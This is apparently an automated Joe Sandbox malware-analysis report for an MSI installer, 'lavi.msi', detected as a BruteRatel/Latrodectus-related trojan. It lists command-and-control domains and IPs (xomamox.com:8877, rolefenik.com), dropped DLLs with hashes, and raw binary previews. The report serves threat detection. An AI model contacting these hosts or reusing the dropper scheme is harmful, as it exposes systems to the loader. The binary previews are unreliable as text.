                                                                                                              		high
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://rolefenik.com/test/:explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.msn.com:443/en-us/feedexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://xomamox.com:8877/Trundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      80.66.76.106
                                                                                                                      		xomamox.comRussian Federation
                                                                                                                      		202723VAD-SRL-AS1MDfalse
                                                                                                                      172.67.191.232
                                                                                                                      		rolefenik.comUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1555052
                                                                                                                      Start date and time:2024-11-13 10:58:17 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 9m 7s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:12
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Sample name:lavi.msi
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.evad.winMSI@9/24@3/2
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 85%
                                                                                                                      • Number of executed functions: 46
                                                                                                                      • Number of non-executed functions: 191
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .msi
                                                                                                                      • Override analysis time to 240s for rundll32

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • VT rate limit hit for: lavi.msi

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      05:01:01API Interceptor10198989x Sleep call for process: explorer.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      80.66.76.106Document-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                        apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                          Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                            yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                              0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                172.67.191.2320TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  rolefenik.comapptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 104.21.92.105
                                                                                                                                  Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 104.21.92.105
                                                                                                                                  yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 104.21.92.105
                                                                                                                                  0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  xomamox.comDocument-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  CLOUDFLARENETUSDocument-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  doc_Capelleaandenijssel_102531613710.htmlGet hashmaliciousPhisherBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  https://wmrc.titurimplec.com/HA02SW/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  https://shorturl.at/gHbMJGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.69.88
                                                                                                                                  REQ 2024 xlx.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  CN-Statement of Accounts and ETax-OB-XXXXX6856-0301282420180880.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  #U0130#U015eLEM B#U0130LG#U0130LER#U0130.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  RFQ for WIKA_pdf.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Sip. fiyat teklif dermok-8128-20241112.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  AYoF5MX6wK.exeGet hashmaliciousSTRRATBrowse
                                                                                                                                  • 104.20.3.235
                                                                                                                                  VAD-SRL-AS1MDDocument-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 80.66.76.106
                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                                                                                                                  • 80.66.64.85
                                                                                                                                  gretdence.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                  • 80.66.64.99
                                                                                                                                  VBwitzAgrx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                  • 80.66.64.99
                                                                                                                                  LisectAVT_2403002B_224.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 80.66.76.30
                                                                                                                                  LisectAVT_2403002B_224.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 80.66.76.30

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  Updatev4_5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  CVMrdORGbI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                  • 172.67.191.232
                                                                                                                                  Yeni sipari#U015f _TR-59647-WJO-001.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.191.232

                                                                                                                                  Dropped Files

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  C:\Users\user\AppData\Roaming\apptext.dllDocument-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                    Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                      C:\Windows\Installer\MSI2527.tmpDocument-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                        Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                          FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                            Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                              Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                                Document-14-33-26.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                  net.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                    Document-14-33-26.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                      1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                        Document-19-36-27.jsGet hashmaliciousUnknownBrowse

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Config.Msi\5d243f.rbs

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):1193
                                                                                                                                                          Entropy (8bit):5.653338257280714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:DlOgVrOpHM6aW9N7RpU4OgFPFDhiSkdGoLK:MGMTV3b1pPFD8SkdGn
                                                                                                                                                          MD5:DE2294900053B69E159747A02CEC9126
                                                                                                                                                          SHA1:D84B7BD9821927B11AFFD1C5F7E1A4D48FD4EA4C
                                                                                                                                                          SHA-256:36C94BF3B7AA289ADFC39BACC7DE2D0CF29B9408F3B7C8A93D169FF26B5D07A2
                                                                                                                                                          SHA-512:C0503BC15AA261A42AABA359349649F9506822C61AFF0CE5BBAB51271ECB1A2C1042F1503E9CBFFDB67758FC0AE35E046F10A1B9061085012793D63CA0309F33
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:...@IXOS.@.....@i'mY.@.....@.....@.....@.....@.....@......&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}..HtmControl..lavi.msi.@.....@a....@.....@........&.{288EF131-2483-44D2-A86F-48308EA76F57}.....@.....@.....@.....@.......@.....@.....@.......@......HtmControl......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}.@......&.{EFB833C5-471A-4841-A27D-3C9DBD3209A2}&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}.@........CreateFolders..Creating folders..Folder: [1]#.6.C:\Users\user\AppData\Roaming\COSACA LTD\HtmControl\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6].. .C:\Users\user\AppData\Roaming\....+.C:\Users\user\AppData\Roaming\apptext.dll....WriteRegistryValues..Writing system registry values..Key: [1]

                                                                                                                                                          C:\Users\user\AppData\Roaming\apptext.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1692160
                                                                                                                                                          Entropy (8bit):6.81012301516061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:M7u7nB/DBD9accSqVO9y/QaDC4F3Zuk5UDJjbDE2W4VO8I/nYY:My/DBD9MVO9yosHF395UlbDBw82nB
                                                                                                                                                          MD5:86B57C9DEAFED093D4B47B03823B4D14
                                                                                                                                                          SHA1:47947DA463DD6F4ECF61AE960235A35144E903A8
                                                                                                                                                          SHA-256:F8E3EEF1FDA5969A7AABCC8FB5CC9F5FE245BBF6CC8E480459977B8E91EAB9BD
                                                                                                                                                          SHA-512:5F855ED0A3ECF561C45608D7F4579D6E4B1F1953863E97E0B5FEA1F33B38D0E03FEF16207D88864D2D936A4E65B677CD259EC248DBF06447B50F9E0488ACEAD3
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..5w..fw..fw..f<..g...fgw.gg..fgw.g}..f<..gp..f<..go..f<..gb..fw..f9..fgw.g...fw..fQ..f?v.g$..f?v.gv..f?v.fv..fw.qfu..f?v.gv..fRichw..f................PE..d.....g..........# ...).............`.......................................@............ A........................................`a..p....a...........^......0.......pS... ......P...p.......................(.......@............................................text...|........................... ..`.rdata...x.......z..................@..@.data...........L...h..............@....pdata..0...........................@..@.rsrc....^.......`...Z..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\5d243d.msi

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {288EF131-2483-44D2-A86F-48308EA76F57}, Number of Words: 10, Subject: HtmControl, Author: COSACA LTD, Name of Creating Application: HtmControl, Template: ;1033, Comments: This installer database contains the logic and data required to install HtmControl., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2131456
                                                                                                                                                          Entropy (8bit):7.438024782173503
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:/c53YhW8zBQSc0ZnSKBZKumZr7Aej3YOXT7wYyr8lCV:QYY0Zn3K/Ai33XXZ0
                                                                                                                                                          MD5:C65899E2519F4AD21FB4B97F0A113362
                                                                                                                                                          SHA1:A1F854C29A69C19949499FCA5E24B02B97BE46FD
                                                                                                                                                          SHA-256:025ABBEC1724B9180B369FE116DA9D90AE47A4996F6A4E28E8A947BAC1E0C741
                                                                                                                                                          SHA-512:ECA93CB24187735EC54D4B4E99675F87F1957E255F59C5432498BBC2C47C77B6CCFDF48861A2F78EB377307CE8F6E6458EAF4B766B96E6C2FAEA1FB87E3DCBB4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...................!...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...............................................................................................................................................................................................................................................................................................................................<...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...;...?...5...6...7...8...9...:.......=.......>.......@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                          C:\Windows\Installer\MSI2527.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):446944
                                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: net.msi, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                                          • Filename: 1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msi, Detection: malicious, Browse
                                                                                                                                                          • Filename: Document-19-36-27.js, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\MSI2586.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):446944
                                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\MSI25B6.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):446944
                                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\MSI25D6.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):446944
                                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\MSI2635.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):400992
                                                                                                                                                          Entropy (8bit):6.59159515749273
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:6MvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1P:6MvZx0FlS68zBQSncb4ZPQTpAjZxqO1P
                                                                                                                                                          MD5:9A4B8A32A74A2B76C73AA21A4911D47A
                                                                                                                                                          SHA1:8FCD2EA10021B0AE2E837335001F87AC63F161CC
                                                                                                                                                          SHA-256:2069DD0CC6A0CB9240597DB508E5E856200D861729A63259B65E18C931ECA950
                                                                                                                                                          SHA-512:F99B18E7A88CF500BA2511D96693EB29F4CAF7A941BEFB9C3B3CCC05BBFE302E74A5685697AF86574BEE7CD3043D23A88589F1EE891ADC0B4CE54E9DB674090B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...@IXOS.@.....@i'mY.@.....@.....@.....@.....@.....@......&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}..HtmControl..lavi.msi.@.....@a....@.....@........&.{288EF131-2483-44D2-A86F-48308EA76F57}.....@.....@.....@.....@.......@.....@.....@.......@......HtmControl......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}6.C:\Users\user\AppData\Roaming\COSACA LTD\HtmControl\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}*.01:\Software\COSACA LTD\HtmControl\Version.@.......@.....@.....@......&.{EFB833C5-471A-4841-A27D-3C9DBD3209A2}+.C:\Users\user\AppData\Roaming\apptext.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".6.C:\Users\user\AppData\Roaming\COSACA LTD\HtmControl\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@...... .C:\Us

                                                                                                                                                          C:\Windows\Installer\MSI2701.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):399328
                                                                                                                                                          Entropy (8bit):6.589290025452677
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                          MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                          SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                          SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
